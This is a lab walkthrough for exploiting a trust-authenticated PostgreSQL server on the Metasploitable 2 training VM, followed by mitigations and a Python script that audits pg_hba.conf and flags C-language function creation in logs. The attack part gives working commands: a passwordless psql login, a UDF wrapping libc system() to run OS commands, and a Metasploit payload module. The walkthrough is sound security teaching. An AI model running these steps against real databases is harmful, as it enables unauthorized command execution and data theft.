01 Vulnerability Overview
PostgreSQL on Metasploitable 2 is configured with trust authentication, allowing passwordless login from any local or remote connection. Once authenticated, attackers can create user-defined functions to execute system commands, leading to remote code execution.
Trust authentication bypasses password checks entirely. Combined with PostgreSQL's ability to run OS commands, this leads to full system compromise.
02 Service Detection

```bash
nmap -sV -v -p 5432 <target-ip>
```
03 Authentication Bypass
Connect to PostgreSQL without a password using psql:

```bash
psql -h <target-ip> -U postgres
```
Due to trust auth, no password is required.
04 Remote Code Execution
Create a user-defined function to execute system commands:

```sql
CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;
SELECT system('id');
```
05 Automated Exploitation — Metasploit

```bash
msfconsole
use exploit/multi/postgres/postgres_payload
set RHOSTS <target-ip>
set USERNAME postgres
run
```
06 Results & Impact
Outcome
- Successfully bypassed authentication due to trust config
- Executed system commands via UDF
- Obtained remote shell access
- Full database access with potential for data exfiltration
Detection & Mitigation (Blue Team)
- Change the authentication method in pg_hba.conf from 'trust' to 'md5' or stronger
- Restrict PostgreSQL access to localhost only
- Use firewall rules to block port 5432 externally
- Monitor for suspicious UDF creation, in particular CREATE FUNCTION statements that use LANGUAGE C
- Apply least privilege principles to database users
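The two checks below put the first and fourth mitigation items into code. This is an added defender-side example, not part of the original walkthrough and not Metasploitable or PostgreSQL project code: it audits a pg_hba.conf for trust rules and rules that accept non-loopback clients, showing the weak configuration next to a hardened one, and it scans PostgreSQL statement logs (what the server writes when `log_statement` is set to `ddl` or `all`) for creation of C-language functions, the UDF technique shown above. All configuration text and log lines are constructed samples; the log timestamp, PID and user@database prefix follow the server's default line layout but are invented here.

```python
"""Audit pg_hba.conf for trust/remote rules and detect native UDF creation in logs."""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed pg_hba.conf contents. The first mirrors the weak setting described
# on this page (trust everywhere, open to any address); the second is hardened.
WEAK_PG_HBA = """\
# TYPE  DATABASE        USER            ADDRESS                 METHOD
local   all             all                                     trust
host    all             all             127.0.0.1/32            trust
host    all             all             0.0.0.0/0               trust
"""

HARDENED_PG_HBA = """\
# TYPE  DATABASE        USER            ADDRESS                 METHOD
local   all             all                                     peer
host    all             all             127.0.0.1/32            scram-sha-256
host    all             all             ::1/128                 scram-sha-256
"""

# Constructed log lines in the server's default "timestamp [pid] user@db LOG:" layout.
SAMPLE_LOG = [
    "2024-01-01 10:00:00 UTC [1234] postgres@postgres LOG:  connection authorized: user=postgres database=postgres",
    "2024-01-01 10:00:01 UTC [1234] postgres@postgres LOG:  statement: SELECT version();",
    "2024-01-01 10:00:05 UTC [1234] postgres@postgres LOG:  statement: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT;",
    "2024-01-01 10:00:09 UTC [1234] postgres@postgres LOG:  statement: CREATE FUNCTION add(a int, b int) RETURNS int AS $$ SELECT a + b $$ LANGUAGE sql;",
    "2024-01-01 10:00:12 UTC [1234] postgres@postgres LOG:  statement: CREATE FUNCTION noop() RETURNS void AS $$ BEGIN END $$ LANGUAGE plpgsql;",
]

LOOPBACK = {"127.0.0.1/32", "::1/128"}


@dataclass
class HbaFinding:
    line_no: int
    rule: str
    reason: str


def audit_pg_hba(text: str) -> list[HbaFinding]:
    """Flag rules that use trust auth or accept clients beyond loopback.

    Comments and blank lines are skipped. 'local' rules have no ADDRESS column,
    so the METHOD is the fourth field; host-style rules carry it in the fifth.
    """
    findings: list[HbaFinding] = []
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if fields[0] == "local":
            address = None
            method = fields[3] if len(fields) > 3 else ""
        else:
            address = fields[3] if len(fields) > 3 else ""
            method = fields[4] if len(fields) > 4 else ""
        if method == "trust":
            findings.append(HbaFinding(no, line, "trust authentication: no password check"))
        if address is not None and address not in LOOPBACK:
            findings.append(HbaFinding(no, line, f"accepts remote connections from {address}"))
    return findings


# CREATE [OR REPLACE] FUNCTION ... LANGUAGE C, with the language name optionally
# quoted; (?!\w) stops 'C' from matching the start of a longer language name.
UDF_RE = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\b.*?\bLANGUAGE\s+['\"]?C['\"]?(?!\w)",
    re.IGNORECASE,
)


def find_native_udf_creation(log_lines: list[str]) -> list[tuple[int, str]]:
    """Return (line number, line) for each statement creating a C-language function."""
    return [(i, line) for i, line in enumerate(log_lines, start=1) if UDF_RE.search(line)]


if __name__ == "__main__":
    for f in audit_pg_hba(WEAK_PG_HBA):
        print(f"pg_hba.conf line {f.line_no}: {f.reason} :: {f.rule}")
    print("hardened findings:", audit_pg_hba(HARDENED_PG_HBA))
    for i, line in find_native_udf_creation(SAMPLE_LOG):
        print(f"log line {i}: native UDF creation :: {line}")
```

On the weak file the audit reports three trust rules and one rule open to 0.0.0.0/0; the hardened file produces no findings. Only the log line that creates the C-language function is flagged; the sql and plpgsql functions are left alone, so the alert stays specific to the technique rather than firing on every CREATE FUNCTION.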